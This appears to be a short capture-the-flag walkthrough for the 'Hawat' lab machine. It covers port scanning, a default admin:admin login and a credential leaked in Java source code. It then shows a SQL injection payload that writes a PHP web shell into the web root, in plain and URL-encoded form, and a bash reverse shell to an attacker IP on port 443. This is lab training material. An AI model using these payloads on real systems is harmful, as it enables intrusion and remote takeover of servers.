Hawat (easy, linux, 2021)

[WDavid404]

Key points:

• admin:admin login to system and download a zip file --> contains a java project files
• Need to analyzer java project file --> find crendentail info and SQL injection issue
• SQL injection: ' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -

[WDavid404]

PORT      STATE  SERVICE      REASON         VERSION
22/tcp    open   ssh          syn-ack ttl 61 OpenSSH 8.4 (protocol 2.0)
17445/tcp open   unknown      syn-ack ttl 61
30455/tcp open   http         syn-ack ttl 61 nginx 1.18.0
|_http-title: W3.CSS
|_http-server-header: nginx/1.18.0
50080/tcp open   http         syn-ack ttl 61 Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15

17445/tcp web page: register a new user (admin:password) and login /user/list --> clinton dummy

30455/tcp /phpinfo.php --> /etc/php7/php.ini /etc/php7/conf.d

50080/tcp: /cloud/index.php/login -->nextcloud 20.0.7 --> didn:t find useful exploit info

admin:admin can login successfully Download issuetracker.zip file unzip it “/issue/checkByPriority” directory In /src/main/java/com/issue/tracker/issues/IssueController.java --> Credentials User “issue_user” and password “ManagementInsideOld797” ---> vulnerable to SQL injection String query = "SELECT message FROM issue WHERE priority='"+priority+"'";

http://192.168.207.147:30455/phpinfo.php shows that “/srv/http” is the 30455 web server’s root directory

Login to http://192.168.207.147:17445/login --> The title is "Issue Tracker" And based on "@GetMapping" info on the pic above --> POST method is allow --> Try POST http://192.168.207.147:17445/issue/checkByPriority, got 400 response. so this path is valid.

Use SQL query ' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- - (Need to use URL encode) Note: The cookie must be valid (after login) %27%20union%20select%20%27%3C%3Fphp%20echo%20system%28%24_REQUEST%5B%22bingo%22%5D%29%3B%20%3F%3E%27%20into%20outfile%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%20--%20-

Access http://192.168.207.147:30455/cmd.php?bingo=whoami -->it works

Lets run bash -c 'bash -i >& /dev/tcp/192.168.45.180/443 0>&1' http://192.168.207.147:30455/cmd.php?bingo=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.180%2F443%200%3E%261%27 Note: The server only allows port 443 so run python server on the same to download the reverse shell code to the attacking machine.